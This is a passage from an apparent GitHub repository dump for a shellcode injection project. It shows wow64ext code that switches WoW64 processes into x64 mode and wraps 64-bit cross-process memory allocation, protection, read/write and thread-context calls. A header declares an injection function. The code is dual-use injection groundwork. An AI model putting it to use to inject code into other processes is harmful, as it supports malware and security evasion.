180 | cmp eax, 2 ;// cmp eax, 2
181 | je _move_0 ;// je _move_0
182 | ;//
183 | _move_1: ;//
184 | movsb ;// movs byte ptr [rdi], byte ptr [rsi]
185 | ;//
186 | _move_0: ;//
187 | pop esi ;// pop rsi
188 | pop edi ;// pop rdi
189 |
190 | X64_End();
191 | }
192 | }
193 |
194 | //bool cmpMem64(void* dstMem, DWORD64 srcMem, size_t sz)
195 | //{
196 | // if ((nullptr == dstMem) || (0 == srcMem) || (0 == sz))
197 | // return false;
198 | //
199 | // bool result = false;
200 | // reg64 _src = { srcMem };
201 | // __asm
202 | // {
203 | // X64_Start();
204 | //
205 | // ;// below code is compiled as x86 inline asm, but it is executed as x64 code
206 | // ;// that's why it need sometimes REX_W() macro, right column contains detailed
207 | // ;// transcription how it will be interpreted by CPU
208 | //
209 | // push edi ;// push rdi
210 | // push esi ;// push rsi
211 | // ;//
212 | // mov edi, dstMem ;// mov edi, dword ptr [dstMem] ; high part of RDI is zeroed
213 | // REX_W mov esi, _src.dw[0] ;// mov rsi, qword ptr [_src]
214 | // mov ecx, sz ;// mov ecx, dword ptr [sz] ; high part of RCX is zeroed
215 | // ;//
216 | // mov eax, ecx ;// mov eax, ecx
217 | // and eax, 3 ;// and eax, 3
218 | // shr ecx, 2 ;// shr ecx, 2
219 | // ;//
220 | // repe cmpsd ;// repe cmps dword ptr [rsi], dword ptr [rdi]
221 | // jnz _ret_false ;// jnz _ret_false
222 | // ;//
223 | // test eax, eax ;// test eax, eax
224 | // je _move_0 ;// je _move_0
225 | // cmp eax, 1 ;// cmp eax, 1
226 | // je _move_1 ;// je _move_1
227 | // ;//
228 | // cmpsw ;// cmps word ptr [rsi], word ptr [rdi]
229 | // jnz _ret_false ;// jnz _ret_false
230 | // cmp eax, 2 ;// cmp eax, 2
231 | // je _move_0 ;// je _move_0
232 | // ;//
233 | //_move_1: ;//
234 | // cmpsb ;// cmps byte ptr [rsi], byte ptr [rdi]
235 | // jnz _ret_false ;// jnz _ret_false
236 | // ;//
237 | //_move_0: ;//
238 | // mov result, 1 ;// mov byte ptr [result], 1
239 | // ;//
240 | //_ret_false: ;//
241 | // pop esi ;// pop rsi
242 | // pop edi ;// pop rdi
243 | //
244 | // X64_End();
245 | // }
246 | //
247 | // return result;
248 | //}
249 |
250 | DWORD64 getTEB64()
251 | {
252 | reg64 reg;
253 | reg.v = 0;
254 |
255 | X64_Start();
256 | // R12 register should always contain pointer to TEB64 in WoW64 processes
257 | X64_Push(_R12);
258 | // below pop will pop QWORD from stack, as we're in x64 mode now
259 | __asm pop reg.dw[0]
260 | X64_End();
261 |
262 | return reg.v;
263 | }
264 |
265 | /*extern "C" __declspec(dllexport) */DWORD64 __cdecl GetModuleHandle64(wchar_t* lpModuleName)
266 | {
267 | TEB64 teb64;
268 | getMem64(&teb64, getTEB64(), sizeof(TEB64));
269 |
270 | PEB64 peb64;
271 | getMem64(&peb64, teb64.ProcessEnvironmentBlock, sizeof(PEB64));
272 | PEB_LDR_DATA64 ldr;
273 | getMem64(&ldr, peb64.Ldr, sizeof(PEB_LDR_DATA64));
274 |
275 | DWORD64 LastEntry = peb64.Ldr + offsetof(PEB_LDR_DATA64, InLoadOrderModuleList);
276 | LDR_DATA_TABLE_ENTRY64 head;
277 | head.InLoadOrderLinks.Flink = ldr.InLoadOrderModuleList.Flink;
278 |
279 | DWORD64 dwRet64 = 0;
280 | do {
281 | getMem64(&head, head.InLoadOrderLinks.Flink, sizeof(LDR_DATA_TABLE_ENTRY64));
282 |
283 | wchar_t* tempBuf = (wchar_t*)malloc(head.BaseDllName.MaximumLength);
284 | if (nullptr == tempBuf)
285 | return 0;
286 | memset(tempBuf, 0, head.BaseDllName.MaximumLength);
287 | getMem64(tempBuf, head.BaseDllName.Buffer, head.BaseDllName.MaximumLength);
288 |
289 | if (0 == _mywcsicmp(lpModuleName, tempBuf)) {
290 | dwRet64 = head.DllBase;
291 |
292 | free(tempBuf);
293 | tempBuf = nullptr;
294 | break;
295 | }
296 | free(tempBuf);
297 | tempBuf = nullptr;
298 | } while (head.InLoadOrderLinks.Flink != LastEntry);
299 |
300 | return dwRet64;
301 | }
302 |
303 | DWORD64 getNTDLL64()
304 | {
305 | static DWORD64 ntdll64 = 0;
306 | if (0 != ntdll64)
307 | return ntdll64;
308 |
309 | ntdll64 = GetModuleHandle64(L"ntdll.dll");
310 | return ntdll64;
311 | }
312 |
313 | DWORD64 getLdrGetProcedureAddress()
314 | {
315 | DWORD64 modBase = getNTDLL64();
316 | if (0 == modBase)
317 | return 0;
318 |
319 | IMAGE_DOS_HEADER idh;
320 | getMem64(&idh, modBase, sizeof(idh));
321 |
322 | IMAGE_NT_HEADERS64 inh;
323 | getMem64(&inh, modBase + idh.e_lfanew, sizeof(IMAGE_NT_HEADERS64));
324 |
325 | IMAGE_DATA_DIRECTORY& idd = inh.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
326 |
327 | if (0 == idd.VirtualAddress)
328 | return 0;
329 |
330 | IMAGE_EXPORT_DIRECTORY ied;
331 | getMem64(&ied, modBase + idd.VirtualAddress, sizeof(ied));
332 |
333 | DWORD* rvaTable = (DWORD*)malloc(sizeof(DWORD)*ied.NumberOfFunctions);
334 | if (nullptr == rvaTable)
335 | return 0;
336 | memset(rvaTable, 0, sizeof(DWORD)*ied.NumberOfFunctions);
337 | getMem64(rvaTable, modBase + ied.AddressOfFunctions, sizeof(DWORD)*ied.NumberOfFunctions);
338 |
339 | WORD* ordTable = (WORD*)malloc(sizeof(WORD)*ied.NumberOfFunctions);
340 | if (nullptr == ordTable) {
341 | free(rvaTable);
342 | rvaTable = nullptr;
343 | return 0;
344 | }
345 | memset(ordTable, 0, sizeof(WORD)*ied.NumberOfFunctions);
346 | getMem64(ordTable, modBase + ied.AddressOfNameOrdinals, sizeof(WORD)*ied.NumberOfFunctions);
347 |
348 | DWORD* nameTable = (DWORD*)malloc(sizeof(DWORD)*ied.NumberOfNames);
349 | if (nullptr == nameTable) {
350 | free(rvaTable);
351 | rvaTable = nullptr;
352 | free(ordTable);
353 | ordTable = nullptr;
354 | return 0;
355 | }
356 | memset(nameTable, 0, sizeof(DWORD)*ied.NumberOfNames);
357 | getMem64(nameTable, modBase + ied.AddressOfNames, sizeof(DWORD)*ied.NumberOfNames);
358 |
359 | DWORD64 dw64 = 0;
360 | // lazy search, there is no need to use binsearch for just one function
361 | int nLdrGetProcedureAddressSize = strlen("LdrGetProcedureAddress");
362 | for (DWORD i = 0; i < ied.NumberOfFunctions; i++)
363 | {
364 | char * pTmp = (char *)(modBase + nameTable[i]);
365 | BOOL bIsBadStringPtr = IsBadStringPtrA(pTmp, nLdrGetProcedureAddressSize);
366 | if (bIsBadStringPtr) {
367 | continue;
368 | }
369 |
370 | int nTmpLen = strlen(pTmp);
371 | if (nLdrGetProcedureAddressSize == nTmpLen) {
372 | if (StrStrIA(pTmp, "LdrGetProcedureAddress") != NULL) {
373 | dw64 = modBase + rvaTable[ordTable[i]];
374 | break;
375 | }
376 | }
377 | }
378 |
379 | free(rvaTable);
380 | rvaTable = nullptr;
381 | free(ordTable);
382 | ordTable = nullptr;
383 | free(nameTable);
384 | nameTable = nullptr;
385 |
386 | return dw64;
387 | }
388 |
389 | /*extern "C" __declspec(dllexport) */VOID __cdecl SetLastErrorFromX64Call(DWORD64 status)
390 | {
391 | typedef ULONG (WINAPI *RtlNtStatusToDosError_t)(NTSTATUS Status);
392 | typedef ULONG (WINAPI *RtlSetLastWin32Error_t)(NTSTATUS Status);
393 |
394 | static RtlNtStatusToDosError_t RtlNtStatusToDosError = nullptr;
395 | static RtlSetLastWin32Error_t RtlSetLastWin32Error = nullptr;
396 |
397 | if ((nullptr == RtlNtStatusToDosError) || (nullptr == RtlSetLastWin32Error))
398 | {
399 | HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
400 | RtlNtStatusToDosError = (RtlNtStatusToDosError_t)GetProcAddress(ntdll, "RtlNtStatusToDosError");
401 | RtlSetLastWin32Error = (RtlSetLastWin32Error_t)GetProcAddress(ntdll, "RtlSetLastWin32Error");
402 | }
403 |
404 | if ((nullptr != RtlNtStatusToDosError) && (nullptr != RtlSetLastWin32Error))
405 | {
406 | RtlSetLastWin32Error(RtlNtStatusToDosError((DWORD)status));
407 | }
408 | }
409 |
410 | /*extern "C" __declspec(dllexport) */DWORD64 __cdecl GetProcAddress64(DWORD64 hModule, char* funcName)
411 | {
412 | static DWORD64 _LdrGetProcedureAddress = 0;
413 | if (0 == _LdrGetProcedureAddress)
414 | {
415 | _LdrGetProcedureAddress = getLdrGetProcedureAddress();
416 | if (0 == _LdrGetProcedureAddress)
417 | return 0;
418 | }
419 |
420 | _UNICODE_STRING_T fName = { 0 };
421 | fName.Buffer = (DWORD64)funcName;
422 | fName.Length = (WORD)strlen(funcName);
423 | fName.MaximumLength = fName.Length + 1;
424 | DWORD64 funcRet = 0;
425 | X64Call(_LdrGetProcedureAddress, 4, (DWORD64)hModule, (DWORD64)&fName, (DWORD64)0, (DWORD64)&funcRet);
426 | return funcRet;
427 | }
428 |
429 | /*extern "C" __declspec(dllexport) */SIZE_T __cdecl VirtualQueryEx64(HANDLE hProcess, DWORD64 lpAddress, MEMORY_BASIC_INFORMATION64* lpBuffer, SIZE_T dwLength)
430 | {
431 | static DWORD64 ntqvm = 0;
432 | if (0 == ntqvm)
433 | {
434 | ntqvm = GetProcAddress64(getNTDLL64(), "NtQueryVirtualMemory");
435 | if (0 == ntqvm)
436 | return 0;
437 | }
438 | DWORD64 ret = 0;
439 | DWORD64 status = X64Call(ntqvm, 6, (DWORD64)hProcess, lpAddress, (DWORD64)0, (DWORD64)lpBuffer, (DWORD64)dwLength, (DWORD64)&ret);
440 | if (STATUS_SUCCESS != status)
441 | SetLastErrorFromX64Call(status);
442 | return (SIZE_T)ret;
443 | }
444 |
445 | /*extern "C" __declspec(dllexport) */DWORD64 __cdecl VirtualAllocEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
446 | {
447 | static DWORD64 ntavm = 0;
448 | if (0 == ntavm)
449 | {
450 | ntavm = GetProcAddress64(getNTDLL64(), "NtAllocateVirtualMemory");
451 | if (0 == ntavm)
452 | return 0;
453 | }
454 |
455 | DWORD64 tmpAddr = lpAddress;
456 | DWORD64 tmpSize = dwSize;
457 | DWORD64 ret = X64Call(ntavm, 6, (DWORD64)hProcess, (DWORD64)&tmpAddr, (DWORD64)0, (DWORD64)&tmpSize, (DWORD64)flAllocationType, (DWORD64)flProtect);
458 | if (STATUS_SUCCESS != ret)
459 | {
460 | SetLastErrorFromX64Call(ret);
461 | return FALSE;
462 | }
463 | else
464 | return tmpAddr;
465 | }
466 |
467 | /*extern "C" __declspec(dllexport) */BOOL __cdecl VirtualFreeEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD dwFreeType)
468 | {
469 | static DWORD64 ntfvm = 0;
470 | if (0 == ntfvm)
471 | {
472 | ntfvm = GetProcAddress64(getNTDLL64(), "NtFreeVirtualMemory");
473 | if (0 == ntfvm)
474 | return 0;
475 | }
476 |
477 | DWORD64 tmpAddr = lpAddress;
478 | DWORD64 tmpSize = dwSize;
479 | DWORD64 ret = X64Call(ntfvm, 4, (DWORD64)hProcess, (DWORD64)&tmpAddr, (DWORD64)&tmpSize, (DWORD64)dwFreeType);
480 | if (STATUS_SUCCESS != ret)
481 | {
482 | SetLastErrorFromX64Call(ret);
483 | return FALSE;
484 | }
485 | else
486 | return TRUE;
487 | }
488 |
489 | /*extern "C" __declspec(dllexport) */BOOL __cdecl VirtualProtectEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD flNewProtect, DWORD* lpflOldProtect)
490 | {
491 | static DWORD64 ntpvm = 0;
492 | if (0 == ntpvm)
493 | {
494 | ntpvm = GetProcAddress64(getNTDLL64(), "NtProtectVirtualMemory");
495 | if (0 == ntpvm)
496 | return 0;
497 | }
498 |
499 | DWORD64 tmpAddr = lpAddress;
500 | DWORD64 tmpSize = dwSize;
501 | DWORD64 ret = X64Call(ntpvm, 5, (DWORD64)hProcess, (DWORD64)&tmpAddr, (DWORD64)&tmpSize, (DWORD64)flNewProtect, (DWORD64)lpflOldProtect);
502 | if (STATUS_SUCCESS != ret)
503 | {
504 | SetLastErrorFromX64Call(ret);
505 | return FALSE;
506 | }
507 | else
508 | return TRUE;
509 | }
510 |
511 | /*extern "C" __declspec(dllexport) */BOOL __cdecl ReadProcessMemory64(HANDLE hProcess, DWORD64 lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead)
512 | {
513 | static DWORD64 nrvm = 0;
514 | if (0 == nrvm)
515 | {
516 | nrvm = GetProcAddress64(getNTDLL64(), "NtReadVirtualMemory");
517 | if (0 == nrvm)
518 | return 0;
519 | }
520 | DWORD64 numOfBytes = lpNumberOfBytesRead ? *lpNumberOfBytesRead : 0;
521 | DWORD64 ret = X64Call(nrvm, 5, (DWORD64)hProcess, lpBaseAddress, (DWORD64)lpBuffer, (DWORD64)nSize, (DWORD64)&numOfBytes);
522 | if (STATUS_SUCCESS != ret)
523 | {
524 | SetLastErrorFromX64Call(ret);
525 | return FALSE;
526 | }
527 | else
528 | {
529 | if (lpNumberOfBytesRead)
530 | *lpNumberOfBytesRead = (SIZE_T)numOfBytes;
531 | return TRUE;
532 | }
533 | }
534 |
535 | /*extern "C" __declspec(dllexport) */BOOL __cdecl WriteProcessMemory64(HANDLE hProcess, DWORD64 lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
536 | {
537 | static DWORD64 nrvm = 0;
538 | if (0 == nrvm)
539 | {
540 | nrvm = GetProcAddress64(getNTDLL64(), "NtWriteVirtualMemory");
541 | if (0 == nrvm)
542 | return 0;
543 | }
544 | DWORD64 numOfBytes = lpNumberOfBytesWritten ? *lpNumberOfBytesWritten : 0;
545 | DWORD64 ret = X64Call(nrvm, 5, (DWORD64)hProcess, lpBaseAddress, (DWORD64)lpBuffer, (DWORD64)nSize, (DWORD64)&numOfBytes);
546 | if (STATUS_SUCCESS != ret)
547 | {
548 | SetLastErrorFromX64Call(ret);
549 | return FALSE;
550 | }
551 | else
552 | {
553 | if (lpNumberOfBytesWritten)
554 | *lpNumberOfBytesWritten = (SIZE_T)numOfBytes;
555 | return TRUE;
556 | }
557 | }
558 |
559 | /*extern "C" __declspec(dllexport) */BOOL __cdecl GetThreadContext64(HANDLE hThread, _CONTEXT64* lpContext)
560 | {
561 | static DWORD64 gtc = 0;
562 | if (0 == gtc)
563 | {
564 | gtc = GetProcAddress64(getNTDLL64(), "NtGetContextThread");
565 | if (0 == gtc)
566 | return 0;
567 | }
568 | DWORD64 ret = X64Call(gtc, 2, (DWORD64)hThread, (DWORD64)lpContext);
569 | if(STATUS_SUCCESS != ret)
570 | {
571 | SetLastErrorFromX64Call(ret);
572 | return FALSE;
573 | }
574 | else
575 | return TRUE;
576 | }
577 |
578 | /*extern "C" __declspec(dllexport) */BOOL __cdecl SetThreadContext64(HANDLE hThread, _CONTEXT64* lpContext)
579 | {
580 | static DWORD64 stc = 0;
581 | if (0 == stc)
582 | {
583 | stc = GetProcAddress64(getNTDLL64(), "NtSetContextThread");
584 | if (0 == stc)
585 | return 0;
586 | }
587 | DWORD64 ret = X64Call(stc, 2, (DWORD64)hThread, (DWORD64)lpContext);
588 | if (STATUS_SUCCESS != ret)
589 | {
590 | SetLastErrorFromX64Call(ret);
591 | return FALSE;
592 | }
593 | else
594 | return TRUE;
595 | }
596 | #endif
597 |
598 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/wow64ext/x32ext.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/wow64ext/x32ext.cpp
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/wow64ext/x32ext.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #ifndef _WIN64
4 | #include
5 |
6 | BOOL Wow64Injectx64(HANDLE hProcess, LPCTSTR lpDllFilePath);
7 |
8 | #endif
9 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/x64/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/x64/Release/BuildLog.htm
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/x64/Release/UnModuelInject.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/x64/Release/UnModuelInject.pch
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/x64/Release/UnModuleInject.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/x64/Release/UnModuleInject.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/x64/Release/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/x64/Release/stdafx.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/x64/Release/vc90.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/x64/Release/vc90.idb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/x64/Release/vc90.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/x64/Release/vc90.pdb
--------------------------------------------------------------------------------
/Windows平台下高级Shellcode编程技术.doc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/Windows平台下高级Shellcode编程技术.doc
--------------------------------------------------------------------------------